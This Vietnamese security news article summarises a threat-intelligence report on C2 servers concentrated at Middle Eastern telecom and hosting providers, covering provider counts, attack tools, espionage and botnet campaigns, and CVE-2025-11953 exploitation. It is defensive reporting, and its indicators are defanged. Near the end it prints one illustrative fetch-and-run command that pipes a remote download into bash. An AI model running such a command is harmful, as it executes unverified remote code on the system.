Tin tức bảo mật ghi nhận việc hacker đang khai thác các mạng viễn thông và nhà cung cấp hosting tại Trung Đông làm nền tảng cho các chiến dịch command-and-control (C2) quy mô lớn, biến hạ tầng đáng tin cậy thành điểm phát lệnh cho các tấn công mạng.
Quy mô hạ tầng C2 được phát hiện
Báo cáo threat intelligence mới công bố cho biết hơn 1.350 máy chủ C2 đang hoạt động đã được xác định trên 98 nhà cung cấp hạ tầng trong vòng 3 tháng. Dữ liệu này phản ánh mức độ tập trung cao của hạ tầng độc hại trên cùng một nhóm nhà mạng và dịch vụ lưu trữ.
Trong phạm vi khảo sát tại 14 quốc gia, các nhà nghiên cứu ghi nhận C2 infrastructure chiếm khoảng 93% tổng hoạt động độc hại được phát hiện. Phần còn lại là các thư mục độc hại bị lộ, website phishing và các threat indicators công khai.
Tham khảo báo cáo gốc tại: Hunt.io Blog.
Phân bố hạ tầng theo nhà cung cấp
Dữ liệu cho thấy mức độ tập trung bất thường tại một số nhà cung cấp hạ tầng viễn thông và hosting. Một nhà mạng lớn chiếm phần đáng kể số C2 server trong khu vực, trong khi một số nhà cung cấp hosting chuyên biệt cũng bị lạm dụng để triển khai hạ tầng điều khiển.
- STC: 981 C2 server, tương đương 72,4% tổng hạ tầng C2 trong khu vực.
- Türk Telekom: 44 C2 server và 6 thư mục độc hại bị lộ.
- SERVERS TECH FZCO: 111 C2 server.
- Regxa Company: 38 C2 server, đồng thời có mức bulletproof rating cao nhất trong bộ dữ liệu.
Bulletproof rating ở đây được dùng để chỉ nhà cung cấp có xu hướng phản hồi chậm với các báo cáo lạm dụng.
Threat intelligence và phương pháp liên kết hạ tầng
Các nhà phân tích cho biết module Host Radar được sử dụng để tương quan giữa máy chủ C2, hạ tầng phishing và thư mục mở, từ đó liên kết ngược về nhà cung cấp và nhà vận hành mạng.
Cách tiếp cận này chuyển trọng tâm từ việc theo dõi từng IOC rời rạc sang quan sát các mẫu sử dụng ở cấp hosting provider, ASN và hành vi mạng lặp lại.
Đây là điểm quan trọng trong tin bảo mật mới nhất vì hạ tầng điều khiển thường thay đổi nhanh, còn dấu hiệu ở cấp nhà cung cấp có tính bền vững hơn.
Các nhóm mối đe dọa và công cụ xuất hiện trên cùng hạ tầng
Các mạng này đang bị dùng chung cho nhiều loại mối đe dọa mạng, từ botnet IoT đến các framework tấn công và công cụ gián điệp. Điều này làm tăng rủi ro bảo mật vì cùng một hạ tầng có thể phục vụ nhiều chiến dịch đồng thời.
- IoT-focused botnets.
- Offensive hacking frameworks.
- Phishing kits.
- Ransomware delivery systems.
- Espionage tools.
Trong nhóm công cụ nổi bật, các mẫu sau được ghi nhận với số lượng C2 IP đáng kể:
- Tactical RMM: 92 C2 IP duy nhất.
- Keitaro traffic distribution system: 71 C2 IP.
- Acunetix: 38 C2 IP.
- Gophish: 31 C2 IP.
Các offensive frameworks như Cobalt Strike, Sliver và AsyncRAT cũng xuất hiện trên cùng lớp hạ tầng. Điều này cho thấy hạ tầng bị lợi dụng không chỉ bởi tác nhân cơ hội mà còn bởi các chiến dịch có mức độ vận hành cao hơn.
Các chiến dịch liên quan và kỹ thuật triển khai
Phân tích ghi nhận một số chiến dịch đang hoạt động trên hạ tầng này. Một botnet được quan sát trên hạ tầng Syrian Telecom, sử dụng mô hình lai giữa giao tiếp web tiêu chuẩn và lớp peer-to-peer để phát tán payload được mã hóa.
Payload bao gồm cả cryptocurrency miner, từng được ghi nhận trong các chiến dịch phát tán LockBit Black ransomware. Việc kết hợp nhiều lớp truyền thông làm tăng độ bền của kênh điều khiển và gây khó khăn cho việc chặn ở mức mạng.
Một chiến dịch gián điệp khác dùng hosting trên Regxa infrastructure để triển khai nhiều công cụ truy cập từ xa thông qua các mồi nhử phishing xoay quanh chủ đề đăng ký Starlink và huấn luyện drone.
CVE được khai thác trong hạ tầng
Trên mạng Mobily, các nhà nghiên cứu phát hiện việc khai thác đang diễn ra đối với CVE-2025-11953, một React Native CLI vulnerability. Kẻ tấn công sử dụng các script được mã hóa để vô hiệu hóa công cụ bảo mật trước khi tải xuống binary độc hại.
Đây là một ví dụ điển hình của cảnh báo CVE gắn với hoạt động hậu khai thác trên hạ tầng viễn thông, trong đó bước tấn công không chỉ dừng ở khai thác lỗ hổng mà còn bao gồm né tránh phòng thủ và nạp payload.
Để đối chiếu thêm thông tin kỹ thuật về định danh lỗ hổng, có thể tra cứu tại NVD.
IOC và dấu hiệu nhận diện
Nội dung gốc cho biết các Indicators of Compromise (IoCs) được cố ý làm mờ định dạng để tránh truy cập nhầm ngoài môi trường kiểm soát. Vì vậy, danh sách IOC chi tiết không được trích xuất trực tiếp trong dữ liệu đầu vào.
- IP address: Defanged trong báo cáo nguồn.
- Domain: Defanged trong báo cáo nguồn.
- Open directories: Có xuất hiện trong quá trình tương quan hạ tầng.
- Phishing infrastructure: Được liên kết với một phần hạ tầng phát hiện.
Trong môi trường phân tích, cần re-fang chỉ trong MISP, VirusTotal hoặc SIEM được kiểm soát.
Điểm cần theo dõi ở cấp hạ tầng
Thay vì tập trung vào từng IOC thay đổi nhanh, các nhóm vận hành nên theo dõi hosting providers, ASNs và mô hình lưu lượng mạng lặp lại. Cách tiếp cận này phù hợp hơn với phát hiện tấn công ở lớp hạ tầng.
Các dấu hiệu đáng chú ý gồm sự xuất hiện đồng thời của C2 server, phishing site, thư mục mở và dịch vụ phân phối lưu lượng trên cùng một nhà cung cấp. Khi các điểm này xuất hiện lặp lại, nguy cơ bảo mật đối với hạ tầng mạng tăng rõ rệt.
Ảnh hưởng hệ thống và bề mặt rủi ro
Hạ tầng bị lạm dụng cho C2 có thể hỗ trợ nhiều giai đoạn của tấn công mạng, từ điều khiển botnet, phân phối payload, phishing cho đến triển khai ransomware. Điều này làm gia tăng nguy cơ hệ thống bị xâm nhập và mở rộng phạm vi tác động sang các tài sản khác cùng mạng.
Trong các trường hợp được ghi nhận, mục tiêu không chỉ là kết nối điều khiển mà còn là tải xuống binary độc hại, phát tán payload được mã hóa và duy trì khả năng truy cập từ xa.
Khả năng khai thác và vận hành
Mặc dù nội dung không nêu mã khai thác (exploit) cụ thể cho toàn bộ hạ tầng, trường hợp CVE-2025-11953 cho thấy kẻ tấn công đã dùng script mã hóa để vô hiệu hóa công cụ bảo vệ trước khi thực thi tải xuống. Đây là dấu hiệu cho thấy chuỗi tấn công có nhiều bước và được triển khai có chủ đích.
curl -sS <defanged-url> | bash
Ví dụ trên chỉ mang tính minh họa cho kiểu thực thi qua CLI thường gặp trong các chuỗi tấn công sau khai thác, không phải lệnh từ báo cáo gốc.
Giám sát và ứng phó
Các đội an ninh mạng nên ưu tiên theo dõi hạ tầng ở cấp provider thay vì chỉ dựa vào blacklist IOC ngắn hạn. Với cập nhật bản vá cho thành phần bị ảnh hưởng, cần kiểm tra thêm các tiến trình lạ, script được mã hóa và lưu lượng ra ngoài đến các endpoint điều khiển.
Trong bối cảnh lỗ hổng CVE được khai thác cùng hạ tầng C2 tập trung, việc kiểm soát bề mặt tấn công ở lớp mạng và lớp máy trạm cần được thực hiện song song để giảm rủi ro an toàn thông tin.
